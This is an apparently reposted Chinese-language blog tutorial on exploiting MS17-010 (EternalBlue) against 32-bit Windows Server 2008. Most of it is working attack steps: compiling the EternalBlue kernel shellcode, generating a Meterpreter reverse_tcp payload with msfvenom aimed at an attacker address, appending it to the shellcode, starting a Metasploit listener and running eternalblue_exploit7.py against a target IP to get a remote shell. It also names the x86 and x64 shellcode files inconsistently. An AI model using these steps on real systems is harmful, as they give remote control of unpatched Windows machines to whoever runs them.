ms17-010對32位系統的利用


前言

metasploit 自帶的永恆之藍攻擊模塊可以直接打windows2008 64位和win 7 64位的系統,但對於32位的系統無法直接攻擊,對於windows 2003 和win10的利用需要收集命令管道或者系統賬號等條件的限制

攻擊windows2008 x86系統

准備ms17-010的相關poc
下載eternalblue_kshellcode_x86.asm
下載eternalblue_exploit7.py
下載鏈接
1.編譯匯編文件eternalblue_kshellcode_x64.asm,這是漏洞的利用代碼,默認效果是藍屏,代碼后面可以另外加shellcode

編譯匯編文件
nasm -f bin eternalblue_kshellcode_x64.asm

2.使用msfvenom 生成shellcode

msfvenom  -p windows/meterpreter/reverse_tcp  -f raw -o shell.bin  EXITFUNC=thread lhost=10.82.115.174 lport=4444

EXITFUNC指定這個payload的退出函數
3.將shellcode代碼附加到漏洞poc中,組裝成專用shellcode
cat eternalblue_kshellcode_x86 shell.bin > shellcode.bin

4.在msf上使用exploit/multi/handler模塊監聽后(注意:payload要和shellcode中的一樣),執行漏洞利用程序eternalblue_exploit7.py
python2的環境運行,eternalblue_exploit7用於低版本的windows,如:Windows 7/2008,eternalblue_exploit8用於高版本的windows,如:Windows 8/2012

python eternalblue_exploit7.py 172.31.28.17 ./shellcode/shellcode.bin 

利用程序顯示done之后,表示成功


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM